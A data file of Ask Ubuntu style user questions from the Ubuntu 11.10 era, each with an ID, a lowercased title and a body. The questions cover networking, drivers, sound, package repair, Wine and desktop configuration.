100980	how to share the 3g internet connection of my android nexus one with my laptop ?	i have an android nexus one with 3g internet connection . i have a asus brazos laptop with ubuntu 11.10 . i would like to share the internet connection of my nexus one with my laptop . in my nexus one . i 've seen these two options : usb tethering and portable wi-fi hotspot do i have to make some configuration with them ? any suggestions to accomplish this ?
100986	any reason not to start openvpn as root ?	i 'm running openvpn ( client ) on a home ubuntu server . i currently create the connection with the command : sudo openvpn /path/to/config/file if i do n't run it as root , i get an error that the tun interface ca n't be created . i found an old thread on the topic where someone suggested adding your user to netdev , but after doing that i still get the same error . how urgent is it to solve this problem ? does it really matter if i init the openvpn connection as root or not ? is it a security hazard ? thanks !
100988	how to force network manager to set auto negotiation to false/off for a particular nic ( eth0 ) on start-up ?	it so happens that i have a nic that is only able to establish a connection with the current network when auto negotiation is set to false . in windows , this can be achieved rather easily by changing the nic properties via device manager . currently i am only able to do so in ubuntu ( 10.04 if that matters ) via the following after login : sudo ethtool -s eth0 autoneg off speed 100 duplex full sudo service network-manager restart ps : i have read reports from ubuntu forums that it may be necessary to remove network-manager and only use /etc/network/interfaces for configuration , but i intend to do so only as a last resort . i would also appreciate it if someone can add auto-negotiation ethtool to the list of tags .
100990	cross-platform duplex scanner with good support in ubuntu ?	i have tried canon p-150 ( review here ) , it works to some extent in windows but i also use many other systems such as ubuntu so it would be convenient if i could use the same scanner over many computers . any good open-source-supported duplex scanner in small size on this market ? if i could find an open-sourced duplex scanner with proper support , i am pretty sure i could get it working over the different systems . or is this a pipe-dream ? what about if i contacted some printd -software in my server that loaded the proprietary bits every time making the `` obfuscated '' scanner more cross-platform-compatible ? any such project around ? ( i know that would not really solve the social problem of distrust between manufacturers and users -- but just a random idea to get the so-called `` scanners '' even to work . )
100991	is the power-cog supposed to turn blue when updates are available ?	my understanding was that the power-cog was supposed to turn blue when updates are available . but i 've noticed that the updates-manager icon appears on the launcher with updates and my power-cog never turns blue . also the envelope-indicator never turns blue when i have new emails . are these bugs ? was i mistaken in expecting this ? is there something i need to do to activate the `` blue '' functionality ? using 11.10 with thunderbird..
100993	the legality of duplicating the gui of a commercial os in an open source desktop	i had a question about the legality of duplicating the design of a commercial os to an open source desktop . let me just cut to the chase . is it illegal to create a desktop window manager that behaves like , and looks like the macintosh gui ?
100994	convert pdf to image	i 'm trying to convert a pdf file ( it 's a book ) into an image . when i using convert like this convert book.pdf book.jpg or like this convert book.pdf book.png then i get this warning warning : short look-up table in the indexed color space was padded with 0's for each page . is there some other tool i can use for conversion to get a bunch of images for this , or can someone show me a different way to solve this problem ?
101003	how to enable unity 's global menu in cinnamon desktop ?	i installed the cinnamon desktop on ubuntu 11.10 64bit but the global menu does not show up . i read that it stills appears and there is a way you can remove it ( by uninstalling the menu packages ) . however , i want the global menu on cinnamon , but it is n't there !
101005	how to specify ec2 instance types for different services ?	after i have specified a default ec2 instance type for my juju charm , how do i override that for one of the services ? for instance , the juju tutorial deploys wordpress and mysql , and i can set the default-instance-type in my environments.yaml so both services are m1.small but how do i configure it so that ( only ) the mysql service gets deployed on an instance type better suited to a database , like m2.xlarge ?
101009	my joypad acting like a mouse	i 've a problem , my joypad actually acting like a mouse , and does n't work with torcs game , somebody know how to make it working properly ?
101014	is it possible to use ubuntu as a broadband remote access server ?	i want to know if it is possible to use an ubuntu server as bras ( broadband remote access server ) , pppoe-server , in network - if so how many concurrent users could it support ?
101015	how to play .mkv files in 9.10	i am using ubuntu 9.10 . recently i had convert my pendrive from fat32 to ntfs format to save mkv files . then when i insert and play it in ubuntu it does n't play . the following error occurs : the required software to play this file is not installed . the playback software mpeg-4 aac decoder is required . how can i get , install and play it on ubuntu 9.10 ?
101017	how to remove space between application and workspace switcher on unity launcher ?	i just downloaded ubuntu 11.10 for the first time . i really enjoy the launcher on the left hand side but have a problem . after playing around with adding applications in it , there are large spaces from the last application to workspace switcher . if i try to drag a new application into the launcher everything moves farther down , instead of filling in the space in between apps . when i right click on the launcher in a blank spot it reads `` drop to add application . '' i 'm looking for a way to have all of the applications close together with no spaces , like when i first downloaded ubuntu .
101019	how to implement a client-server application using corba standards ?	i have been working on corba for making the client-server applications , i have already made some but having difficulty when i use to implement my application using different idls on different server machines and a single client machine . can someone guide me for further or have some idea about it or have some experience of using corba .. ?
101024	stripes all over the desktop	i am running ubuntu 11.10 , gnome shell . after some amount of memory consumption , my ubuntu starts displaying stripes all over my desktop and also in the native application windows like empathy , nautilus etc . my system information is as follows , memory : 2.9 gb processor : intel pentium dual-core cpu e5200 @ 2.5 ghz graphics : intel速 g33 x86/mmx/sse2 screen shots : any help is appreciated .
101025	benq 5000 scanner not working	my scanner is detected but its not working scanner benq 5000 lsusb root @ onezero : /home/one # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 093a:2700 pixart imaging , inc . bus 005 device 003 : id 04a5:20f8 acer peripherals inc. ( now benq corp. ) benq 5000 how do make it work
101028	unity 3d not supported , intel 945gm graphics card	i have just installed ubuntu 11.10 on my computer , and everything seems to run great . well , almost . at log on , i can select from the settings the ubuntu desktop ( not ubuntu 2d ) . compiz configuration manager did n't seem to be doing anything to my unity 3d desktop . so , just to check , i run : echo $ desktop_session sure enough it tells me i 'm running unity 2d . does the fact that 3d wont run mean that my video driver will not support unity 3d ? i have an intel 945gme chipset , and tried to find information about drivers , but any fixes and workarounds all seemed to be for older versions of ubuntu , and did not work ( or i did n't do it right , i am after all a new linux user ) . after messing around with all that , i did a fresh install and just tried again to see if compiz settings manager would do anything , but i ca n't get unity 3d to work . to describe my process the second time around : first do a fresh install , then as soon as that 's done install the following : sudo add-apt-repository ppa : paullo612/unityshell-rotated sudo apt-get update sudo apt-get install unityshell-rotated libnux-1.0-0 compizconfig-settings-manager i wanted to intall the unity rotated plugin ( i ca n't stand having the launcher on the left side for some reason , but i really like the concept of the launcher , and do n't really want to switch to gnome , which also did n't look right when i tried it ) . but neither unity rotated nor unity 3d are going to work for me if i have an issue with my hardware or drivers , will they ? if it is a video card driver/hardware issue , its not showing in normal use . viewing of flash videos is n't as good as it was when i was running windows on this machine , but its not bad . maybe just a little bit streaky . not enough to really bother me a lot . my video card is certainly working to that extent , but it can do better . there are no additional drivers that ubuntu finds for my computer at all . running unity_support_test results in these errors : nathan @ vaio : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : mesa project opengl renderer string : software rasterizer opengl version string : 2.1 mesa 7.11 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no so far , my card still does n't work . it seems strange devius , that your computer all of a sudden works . i am running kernel 3.0.0-15 . maybe this can help somebody solve this issue : maybe my graphics card is not configured ? there is no xorg.conf file in its proper directory -- should there be ? supposedly the file is supposed to be there , but on my system , its simply missing all of the software sources are enabled in the software center . so , i am reaching out to the linux community . any suggestions ?
101029	how do i mount a cifs share ?	i 'm using ubuntu 11.10 , and am trying to mount a freenas server . i have the server set to share in cifs and nfs with no luck . i have tried smbmount //192.168.1. # # # /mnt/ i am not new to ubuntu but am nowhere near a power user , so i 'd prefer a gui option if available . how do i mount a cifs share in 11.10 ?
101030	apache virtualhost keeps pointing to default directory	i have been trying to set an apache name based virtual host ( http : //test.local ) to the directory /var/www/test , but it keps on pointing to the default /var/www directory . my test.local configuration file looks like this- http : //paste.ubuntu.com/827328/ my hosts file looks like this- http : //paste.ubuntu.com/827338/ and the ports.conf file looks like this- http : //paste.ubuntu.com/827332/ as per suggestion form irc chat i disabled the default virtualhost , then something wierd happened . now http : //test.local , http : //127.0.0.1 loads contents of /var/www . but http : //localhost shows the contents inside /var/www/test . i 'm using likewise-ope to connect to windows domian based network , it has created an entry in hosts file ( the first line , also included is the next two lines ) ) - 127.0.0.1 asset11.domain.com asset11 localhost 127.0.0.1 artis.local 127.0.0.1 test.local how can i make http : //test.local to point to /var/www/test correctly
101032	flash debug player installation problem	standard version : when i download the player without the debugger from here and place the libflashplayer.so file into the ~/.mozzila/plugins/ directory the player works fine . debugger version : but when i download the plugin from : http : //www.adobe.com/support/flashplayer/downloads.html ( download the linux flash player 11.1 plugin content debugger ( tar.gz , 6.86mb ) ) the player is not working . i need to know how to install the debugger version . system info : linux mashine 3.0.0-15-generic # 26-ubuntu smp fri jan 20 17:23:00 utc 2012 x86_64 x86_64 x86_64 gnu/linux browser info : /usr/lib/firefox-9.0.1/firefox : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , stripped edit : i set up a virtual mashine with ubuntu 11.10 32bit version and the flash player with debugger works fine . so it 's a problem related to the 64 bit version .
101036	how do i connect picasa 3.9 to my online account ?	a previous discussion gave excellent instructions on running the latest picasa version on ubuntu 11.10 , but i still ca n't get an effective connection between the desktop application and my online account . existing instructions for installation and config of connection between picasa desktop and server i tried the winetricks approach , but my netbook perhaps does not have the grunt to process all the information at once . it requested i instal gecko the first time i tried to connect with my picasa account , but then just hangs . having installed winetricks , how may i uninstal it and use the application specific password approach you mention ? thanks for your assistance
101040	world of warcraft with wine ( directx error )	i 've just installed ubuntu this night , however starting wow will give me a directx error . i have installed directx through the normal installer and through/with crossover . how can this be resolved ? thanks in advance .
101041	differences between windows active directory and ubuntu samba	i 'm going to implement file server . but i have 2 choice : windows active directory ubuntu samba which one is reliable and secure ? what are the advantage and disadvantage of both ?
101046	removing the underlines from menu key words	if i click on a menu at the top of the screen in , say , gimp , and navigate through the options , then key words - or rather , key letters - suddenly become underlined . my guess is that this is keyboard shortcut access . it 's a bit untidy and not something i use , though , and i 'm wondering if there 's a way to turn the underlining off . like , perhaps , in dconf or something . or is this not possible ?
101049	how to resolve an `` out of frequency range '' error after booting	i tried to install ubuntu 11.10 from a live cd and from a usb pendrive , but when i choose try ubuntu or install ubuntu from the boot screen , all i get is this message : `` out of frequency range '' and the monitor turns off in few seconds . i use an nvidea geforce fx 5200 graphic card .
101050	should i update to an lts release ?	this is probably still too early to worry about , but i 'm just curious . i am not currently using an lts ubuntu on my laptop . now , when the next lts comes out , should i upgrade ? or should i skip this version and wait till the next non-lts version is released ? i should note that i am one of those people that likes to keep having new stuff , thus i do n't want to stay with an lts version and wait 2 years till the next lts is released . in summary : if i upgrade to an lts , will it be possible/easy to update to the following non-lts or will a re-installation of the os be required ?
101057	ubuntu 11.10 x64 and amd processor slow performance	i 'm having a problem with the last distributive of ubuntu . the problem is that with an intel dualcore e7500 , 4gb of ram ddr3-1600 and x32 bits type of os with pae enabled , i have not met performance issues , but when i have switched to amd athlon x2 245 , 4gb of ram ddr3-1600 and x64 bits type of os , after this performance fell . even at startup of ubuntu without any active process , gui is slow . i have disabled detect refresh rate , sync to v blank in compiz , but but without any success . it 's the problem really in x64 version of ubuntu or the problem is the processor ? 1 ) glxinfo | grep -i direct direct rendering : yes gl_ext_copy_buffer , gl_ext_copy_texture , gl_ext_direct_state_access , 2 ) sudo lspci | grep vga 01:05.0 vga compatible controller : ati technologies inc 760g [ radeon 3000 ]
101058	minecraft , java , ubuntu and a socks proxy	how is it possible to run a java game like minecraft behind a ssh tunnel ( socks proxy ) . i configured the proxy in oneiric in the system settings and ubuntu one , pidgin , and so on works . but not the java game minecraft . what can i do ? this solution did not work : java -dhttp.proxyhost=host -dhttp.proxyport=port -dhttps.proxyhost=host -dhttps.proxyport=port -xmx1000m -jar xxxxxxx.jar can anyone help me ?
101061	add custom location in weather applet	i am trying to add a custom location to the weather report applet ( also known as libgweather ) in ubuntu 11.04 . i am using libgweather 2.30.3-1ubuntu1.1 , the latest available version for ubuntu 11.04 . to add this location , i edited /usr/share/libgweather/locations.xml and added the details from the weather station that i wanted as found on http : //weather.noaa.gov/data/nsd_cccc.txt ( a link that i found in some posting on another forum about an old version of libgweather ) . the details entered do not provide weather data . the location does show up in the location list , however , the applet does not display any information . now my question is : where can i see where libgweather pulls the information from ? i have read something about that google is a source , but i would like to see which file on my system points to an information source so that i can maybe add a different source for that information .
101064	uninstall a program installed with wine	i am using ubuntu 11.10 . by using wine software i installed some software like nimbuzz and ibibo messenger . both the programs are not working and showing the bug as we 're sorry , but an unknown error has caused ibibo messenger to close . so i wan na uninstall those . how to uninstall those type of programs which i installed through wine ?
101065	does libpg-java support passwordless login ?	the following command runs fine , that is , does n't ask for a password , prints no warnings or errors , and simply provides a db prompt : $ psql -u dbuser dbname psql ( 8.4.10 ) type `` help '' for help . dbname= # when trying to generate an erd out of this db with schemaspy ( running as the same host user ) , it does n't work : $ java -jar ~/schemaspy.jar -dp /usr/share/java/postgresql.jar -t pgsql \ -host localhost -db dbname -u dbuser -o ~/db using database properties : [ / [ ... ] /schemaspy.jar ] /net/sourceforge/schemaspy/dbtypes/pgsql.properties failed to connect to database url [ jdbc : postgresql : //localhost/dbname ] org.postgresql.util.psqlexception : the server requested password-based authentication , but no password was provided . if i try with a blank password ( -p '' ) , it instead prints : org.postgresql.util.psqlexception : fatal : password authentication failed for user `` dbuser '' how do i run schemaspy on a postgresql database with a db user that has no password ? i tried changing the pg_hba.conf settings to completely permissive , but it still does n't work : $ sudo grep ^local /etc/postgresql/*/main/pg_hba.conf local all postgres ident local all all trust
101067	ubuntu one - u1sdtool - slow and not responsive	i just installed lubuntu 11.10 on my new system . i want to use ubuntu one within the terminal , so i tried it with u1sdtool . if i try u1sdtool -- version , it took almost a minute to get a result ( version 2.0.0 ) . if i try u1sdtool -- status , i get an error : oops , an error ocurred : traceback ( most recent call last ) : failure : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . on the other side , if i put some file in the /home/user/ubuntu one directory , it is synchronized with the cloud ( and vice verse ) . i would like to use ubuntu one service , but it is slow and not responsive . it should also have a percentage indicator ( for large files ) . any idea , what is going on ?
101068	how do i buy from the ubuntu one music store through a web browser ?	where do i go when i 'm using a non-ubuntu computer and want to buy an album from the ubuntu one music store ?
101070	what 's the fastest distro to run under virtualbox ?	i would like to have an ubuntu virtualbox vm to develop in java . though , it seems somewhat an overkill to run only the jvm , intellij , grails , git , maven ... as i am new to linux , i would like to keep on using ubuntu . what do you recommend as distro of choice ? xubuntu ? lubuntu ? any other ? thanks !
101074	authorization code	when trying to download updates , e.g. , flash , there comes up a prompt for authorization code . i tried my password but it will not accept it . the person who set up ubuntu is no longer around for any help . does anyone have any ideas why my password wont work ? ? i tried reinstalling ubuntu but same the problem appears .
101077	simple and easy way to bypass blocked sites	my isp blocks a lot of websites so i need an easy way to bypass it . i use a proxy to bypass it . what if i use my own squid server will it bypass my isp block sites ? i need an easy and simple way to bypass blocked websites . for dns server i have tried opendns and google dns . now i 'm using my own dns server . as for tor , i have used it , it work fine at bypassing the block but not for playing youtube or flash videos . as tor using arora browser , maybe that 's why its not playing videos .
101078	touchpad stop working	i have an hp 430 pc-notebook using oneiric . and sometimes my touchpad just stops working . ( i have n't installed anything , just safe playing with terminal following linuxcommand.org in windows , i could two-finger touch to toggle locking the touchpad . and as far as i know , ubuntu does n't have this function so i do n't think that 's the problem ...
101079	internet via openvpn	i managed it to install openvpn on a virtual host and the connection works great , but i am not able to use the internet through the openvpn server ( it s only possible to ping the servers ip ) . how can i configure the openvpn server to access the internet ? i enabled ip-forwarding , but i do n't know how the pull `` route xxxxxxxxxx '' command exactly works . i should enter the local ip and subnet , but how can i get it ? i only know the server 's static ip . thanks in advance
101083	no contacts in empathy after upgrading to 3.3.2 ( ubuntu 11.10 x64 )	i recently upgraded to empathy 3.3.2 per the ppa : telepathy/ppa repository and suddenly all the contacts i had from facebook chat , gtalk and msn messenger dissapeared even though the accounts window said that empathy is connected to them . i 've tried removing the accounts and adding them again , i 've tried removing empathy 3.3.2 its dependencies and the telepathy repository and reverting to empathy 3.2.0.1 but the problem stayed even after downgrading . could it be i missed some important dependency that stayed with its latest version or maybe it 's something else ... thank you for your help .
101086	to which folder did i install the faenza icon theme to ?	i downloaded the faenza icon theme . i also installed the advanced settings app from the software centre . i double-clicked the faenza install file and it opened a terminal list of commands which i followed . easy enough . except that i noticed that you 're supposed to install it as root ( so that it can copy the icon files into the file system rather than home . if you do n't install as root , then a bunch of the icons are n't copied across . this meant that it installed twice , as you can by the screenshot . i simply want to remove the non-root files but do n't know where they copied to . does anyone know where they would be ?
101088	no sound in inbuilt speakers ?	i am using ubuntu 11.10 . last night i am searching some help on using my headfone mic . but i found nothing . then i install pavcontrol and remove that . by this cmd : sudo apt-get install pavucontrol then i uninstall that sudo apt-get purge pavucontrol but i found something which says me it will use start using ur mic then i try this : sudo apt-get install paman padevchooser paprefs pavucontrol pavumeter but some package error comes then i leave this and move ahead error was : package padevchooser is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'padevchooser ' has no installation candidate then after restart my sound is not working but i am able to hear sound on my sound system & headfones only problem is i am not able to use my system inbuilt speakers . i check my alsamixer & sound setting nothing is mute everything is working fine my pactl stat currently in use : 1 blocks containing 64.0 kib bytes total . allocated during whole lifetime : 6707 blocks containing 21.8 mib bytes total . sample cache size : 0 b server string : unix : /home/gaurav/.pulse/bc36bc434b13df8339b314820000000d-runtime/native library protocol version : 24 server protocol version : 24 is local : yes client index : 11 tile size : 65496 user name : gaurav host name : gaurav server name : pulseaudio server version : 1.0 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_1b.0.analog-stereo default source : alsa_output.pci-0000_00_1b.0.analog-stereo.monitor cookie : 66d0:548d i also check whether pulseausio is running or not : pulseaudio e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . is there anything is did worng i tried with this question but nothing helps me
101093	auto save all visited pages in firefox	so is there any add-on which automatically saves all the pages i visit in some cache , so that i can access them in offline mode also . i am using firefox-8.0 and ubuntu-10.10 .
101095	with external display , screen turns black after start from suspend xubuntu 11.10	i work with a thinkpad x220 and have xubuntu 11.10 installed . everything works fine , except for this ; when i suspend my laptop , while it is connected to my external monitor ( either cloned screen or only using the external monitor ) , it gives a blank screen when coming out of suspend . i can still see my mouse moving , but both screens remain blank . only a hard reset fixes the issue . returning it to suspend ( by closing laptop ) does nothing . both screens remain inactive ( black , but with mouse pointer ) after wakeup from suspend/sleep . some further information ; a ) i have memorized the `` display settings '' command . when i press the command sequence on my keyboard to 1 ) show only laptop screen and then 2 ) show only the external screen , my display ( on the external monitor ) returns and i can proceed as normal . but i have to do this every time , and when i make one mistake i am lost ( as i can not see the output unless i do it completely right ) . b ) i have now installed the gui interface `` grandr '' and edited to e.g . show only my external monitor or a dual screen setup ( depending on my preferences ) . now , when i put my laptop to sleep/suspend , both displays work normally ( dual or only single external display ) after resuming from sleep or suspend . - so i guess the is sort of a solution , but it requires you to install grandr and not to use the xubuntu display settings menu . maybe someone has a better solution or fix ?
101098	youtube video location in firefox	as i moved to newer version of firefox-8.0 i lost the location firefox use to store flash videos previously it used to be in /tmp/flash**** , but now it 's not there even in .mozilla/firefox/profile-name/cache they have changed the storage scheme . so is there any way to know where these videos/flash are stored ? moreover if it get changed again then how can we locate the location of video being buffered . edit : also about : cache and locating video did n't help .
101100	switch from path bar to location bar permanently in nautilus	as most of you know , you can switch between the visual location entry , and the text based one in nautilus , by hitting ctrl+l . when i tried to set this value permanently in gconf-editor , it does n't exist . when i tried to do it via the terminal , this is the message that i receive : no value to set for key : /apps/nautilus/preferences/always_use_location_entry i can still switch between the two via the ctrl+l , but i 'm stumped about the fix .
101102	is ubuntu compatible with asus x58c ?	i have installed ubuntu on my asus x58c the install when fine but after the screen went black , i thought it was becouse i installed 64bit ( the laptop has 4gb ram ) but then when i installed the 32bit version the same thing happened .
101104	no wireless connection detected hp pavilion dv6 1220 with a broadcom bcm 4312	i just installed ubuntu 11.10 on my hp pavilion dv6 1220 ek and the laptop does n't detect any wireless connection . two hours before that , windows 7 was running on my machine and the wifi functioned perfectly . does anyone have an idea ? i 've been trying for several hours to fix it without success . output of lspci -nnk | grep -i net -a2 : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1508 ] kernel driver in use : b43-pci-bridge -- 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 02 ) subsystem : hewlett-packard company device [ 103c:3628 ] kernel driver in use : r8169 output of sudo ifconfig wlan0 up ; iwconfig : siocsifflags : no such file or directory lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : on
101105	how to assign `` back '' and `` forward '' actions to logitech anywhere mouse mx ' horizontal scroll wheel ?	i am using a logitech anywhere mouse mx on my ubuntu . mouse works well , but i ca n't assign the actions to the extra buttons available on it . what i miss the most is the `` back '' and `` forward '' actions assigned to the scroll wheel tilt left and right . how can i activate these features ?
101106	how to run lineage 2 on ubuntu ?	i ca n't run lineage2 on ubuntu 11.10 . does anyone know the solution , how to start it ? what do i need to do to get it work . when i start l2.exe , it does n't open or do anything or it opens with no buttons in the game . help please .
101107	how can i get copies of default config files ?	is there an easy way to get default configuration files of a given ubuntu version ? for example where to get the default apache2.conf for ubuntu 9.10 ?
101108	i messed up my local package system , how can i repair it ?	after removing a ppa recently my local package system got messed up . it now asks me to run sudo apt-get -f install to fix dependencies . having waited a couple of days for the issue to resolve itself ( sometimes dependencies change due to new pacakage releases ) , it did n't happen after all . so my question is : what is the way out ? is reinstalling the system the only method ? note : i am aware that this is not the place to handle your problems with alpha releases , but in my opinion it is worthwhile to give a general answer on how to tackle the problem . ps : the terminal output of my specific problem $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libx264-118 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libglib2.0-0 libglib2.0-bin libglib2.0-dev suggested packages : libglib2.0-doc the following packages will be upgraded : libglib2.0-0 libglib2.0-bin libglib2.0-dev 3 upgraded , 0 newly installed , 0 to remove and 150 not upgraded . 9 not fully installed or removed . need to get 0 b/3.062 kb of archives . after this operation , 130 kb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : error processing libglib2.0-0 ( -- configure ) : libglib2.0-0 : amd64 2.31.14-0ubuntu1~build1 can not be configured because libglib2.0-0 : i386 is in a different version ( 2.31.14-0ubuntu1 ) dpkg : dependency problems prevent configuration of libglib2.0-bin : libglib2.0-bin depends on libglib2.0-0 ( = 2.31.14-0ubuntu1~build1 ) ; however : package libglib2.0-0 is not configured yet . dpkg : error processing libglib2.0-bin ( -- configure ) : dependency problems - leaving unconfiguredno apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of libglib2.0-dev : libglib2.0-dev depends on libglib2.0-0 ( = 2.31.14-0ubuntu1~build1 ) ; however : package libglib2.0-0 is not configured yet . libglib2.0-dev depends on libglib2.0-bin ( = 2.31.14-0ubuntu1~build1 ) ; however : package libglib2.0-bin is not configured yet . dpkg : error processing libglib2.0-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libglib2.0-0 : i386 ( -- configure ) : libglib2.0-0 : i386 2.31.14-0ubuntu1 can not be configured because libglib2.0-0 : amd64 is in a different version ( 2.31.14-0ubuntu1~build1 ) dpkg : dependency problems prevent configuration of libgtk-3-0 : libgtk-3-0 depends on libglib2.0-0 ( > = 2.31.14 ) ; however : package libglib2.0-0 is not configured yet . dpkg : error processing libgtk-3-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgail-3-0 : libgail-3-0 depends on libglib2.0-0 ( > = 2.31.14 ) ; however : package libno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already glib2.0-0 is not configured yet . libgail-3-0 depends on libgtk-3-0 ( = 3.3.12-0ubuntu1~build1 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgail-3-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-gtk-3.0 : gir1.2-gtk-3.0 depends on libgtk-3-0 ( > = 3.3.12 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing gir1.2-gtk-3.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk-3-bin : libgtk-3-bin depends on libgtk-3-0 ( > = 3.3.12-0ubuntu1~build1 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgtk-3-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk-3-dev : libgtk-3-dev depends on libgtk-3-0 ( = 3.3.12-0ubuntu1~build1 ) ; however : package libgtk-3-0 is not configured yet . libgtk-3-dev depends on gir1.2-gtk-3.0 ( = 3.3.12-0ubuntu1~build1 ) ; however : package gir1.2-gtk-3.0 is not configured yet . libgtk-3-dev depends on libglib2.0-dev ( > = 2.31.14 ) ; however : package libglib2.0-dev is not configured yet . dpkg : error processing libgtk-3-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libglib2.0-0 libglib2.0-bin libglib2.0-dev libglib2.0-0 : i386 libgtk-3-0 libgail-3-0 gir1.2-gtk-3.0 libgtk-3-bin libgtk-3-dev e : sub-process /usr/bin/dpkg returned an error code ( 1 )
101109	no sound output from my built-in speakers ( dell n5040 )	i am using ubuntu 10.04 lts desktop and i do n't have any sound output from the built-in speakers in my dell n5040
101115	is there a way to shut off showing the user 's wallpaper in lightdm ?	i do n't want to expose my wallpaper to other people who share my computer , is there a way i can disable this feature or work around it ?
101119	'invalid http proxy ( http : //localhost:4001 ) : bad uri ' error adding a gpg key	i m installing tor i got gpg error i have install tor just 15 mint ago on my vm & it was working perfect http : //www.webupd8.org/2009/09/how-to-install-tor-in-ubuntu-debian.html adding the gpg key and installing tor and privoxy in ubuntu / debian . open a terminal and paste this : gpg error root @ onezero : /home/one # gpg -- keyserver keys.gnupg.net -- recv 886ddd89 gpg : requesting key 886ddd89 from hkp server keys.gnupg.net ? : invalid http proxy ( http : //localhost:4001 ) : bad uri gpgkeys : http fetch error 7 : could n't connect : success gpg : no valid openpgp data found . gpg : total number processed : 0
101132	setting ppas during installation to fetch updates	the last versions of ubuntu allow to download updates during the installation process . is it possible to configure a ppa to fetch updates instead of using the default repositories ? e. g. configure the kubuntu backports ppa when installing kubuntu 11.10 to get kde4.8 during the installation process .
101133	upstart memcached	i 've put together an upstart script for memcached based on the init.d script it ships with , as i could n't find any examples anywhere . the problem is it 's not respawning automatically when i kill the process . env daemon=/usr/bin/memcached env daemonbootstrap=/usr/share/memcached/scripts/start-memcached start on started stop on runlevel [ ! 2345 ] respawn post-stop script start-stop-daemon -- stop -- pidfile /var/run/memcached.pid -- name memcached -- chuid nobody -- user nobody -- exec $ daemon -- signal term end script exec start-stop-daemon -- start -- quiet -- exec $ daemonbootstrap
101139	how to install vmware player ?	i want to install vmware player 4.0.2 on my ubuntu 11.10 , but i do n't know how . can someone help me with a step by step tutorial ?
101142	how to disable ( hide ) weekday in gnome-shell ( gnome 3.x ) clock ?	i ca n't find a way to remove weekday name from clock applet in gnome-shell , is it possible without editing the source ?
101145	select and drag-paste in terminal	generally this feature is there in web-pages , text files that when you double click ( or select some text area ) and drag it some other location , then it gets paste over there . like above i selected so that and drag . i was wondering if same is possible in gnome-terminal which we use in linux system . if any one has idea kindly share .
101152	ubuntu restart while starting video files	ubuntu ( x ) restarts to login screen while starting video files in vlc or banshee . totem works well ( i mean videos run , but still they are choppy )
101158	portable user account	is it possible to create a portable user account in ubuntu ? what do i mean by portable ? well , lets say i have a usb drive . on the usb drive i have a typical home folder ( unencrypted ) with all the config stuff and personal file , pic , music , etc . i plug it in and it mounts . is it possible to get the dm to see this ? i 'm making the assumption this user account was created with the live distro avoiding any potential compatibility issues .
101162	unable to delete recup_dir.1 folder	a folder was created when i used a utility to recover pictures from a cd card that i deleted by mistake . now i ca n't delete it or move it . i am told i am not the owner of it even when i am logged on as root . how can i delete the recup_dir.1 folder from my machine ?
101169	how do i get a motu 828 mk ii working ?	i recently installed ubuntu 11.10 , which is proving to be a nice os - it 's pretty fun to learn . i was wondering how to get ubuntu to recognize my motu 828 mk ii firewire audio dsp ( ? ) unit . it 's connected by firewire to the valid firewire port on my computer , and so ( i believe ) is being recognized by jack . when i start jack , it starts the server ( unlike when i had the 828 plugged in to another firewire port that i do n't remember ever using , and so must be inactive ) , but the client ca n't connect ... after this , i try to stop the server , but it , for whatever reason , wo n't stop . i then close jack to try to start the server again , only to find that i ca n't restart the server ( perhaps because the server was n't ended.. ? ) . the server 's location is /usr/bin/jackd . the settings of cjackctl is set as is shown in step 4 of the firewire page on ubuntu 's community wiki . any ideas ? oh , and if there 's another way of using my dsp with ubuntu other than using jack , i 'm open for suggestions . i 'm also looking into ffado as a way to send audio from my computer to the dsp .
